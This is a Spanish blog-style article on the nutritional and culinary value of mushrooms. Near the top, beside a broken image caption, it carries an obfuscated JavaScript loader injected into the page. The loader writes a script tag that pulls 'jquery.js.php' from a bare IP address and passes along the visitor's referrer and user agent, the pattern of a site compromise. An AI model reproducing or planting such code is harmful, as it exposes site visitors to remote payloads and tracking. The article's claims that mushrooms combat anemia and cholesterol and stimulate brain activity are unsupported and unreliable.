Hongos, nutrición pura

=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('3.h("<7 8=\'2\' 9=\'a\' b=\'c/2\' d=\'e://5.f.g.6/1/j.k.l?r="+0(3.m)+"\n="+0(o.p)+"\'><\/q"+"s>");t i="4";',30,30,'encodeURI||javascript|document|ksaty||97|script|language|rel|nofollow|type|text|src|http|45|67|write|nnzak|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) id=”attachment_1072″ align=”aligncenter” width=”600″ caption=”Foto: cortesía de © Eugenio Polacchini | Dreamstime.com”]

Los hongos o setas son alimentos muy apreciados en la gastronomía. Además de ser sumamente nutritivos, confieren a los platillos deliciosos aromas y sabores, por lo que resultan una excelente opción alimenticia.

Los hongos son ampliamente consumidos por vegetarianos y macrobióticos debido a su aporte de proteínas y a su consistencia similar a la de la carne. Pueden utilizarse para acompañar toda clase de platillos, como pescados, pastas y arroz, verduras y legumbres. Asimismo, pueden consumirse secos, triturados y en polvo, añadiéndose como condimento a los guisados y sopas. Pero también pueden constituir en sí mismos en platillo principal (por ejemplo, un hongo portobello relleno de queso de cabra y jitomate… ¡delicioso!).

Existen muchas variedades de hongos y setas comestibles. Algunas se recolectan en estado silvestre; otras, como los champiñones, se cultivan para consumo humano en recintos especiales. La variedad más conocida es el champiñón; entre los hongos salvajes se encuentran las trufas –negras, grises y blancas-, el Portobello, grande y jugoso, los tartufos, las setas, el shiitake japonés y muchas más.

Los hongos comestibles son sabrosos y bajos en calorías, por lo que resultan ideales para llevar una alimentación saludable, basada en productos orgánicos y naturales. Aportan alrededor de 20 kcal por cada 100 gramos. Además, tienen un bajo contenido de azúcares y son muy ricos en agua, por lo que conviene consumirlos frescos.

Además, se caracterizan por su alto contenido de proteínas de alta calidad, característica que les ha valido el título de “proteína vegetal” o “carne vegetal”.

Los hongos aportan fibra, vitamina C y D, provitamina A, niacina, ácido fólico, ácido pantoténico y vitaminas del complejo B (B2, B3). En cuanto a minerales, cabe destacar su aporte de selenio, calcio, magnesio, fósforo, calcio, yodo, potasio y zinc.

Por último, cabe mencionar que los hongos poseen un gran potencial medicinal. Son estimulantes de la actividad cerebral y nerviosa y también eficaces contra la anemia y el colesterol.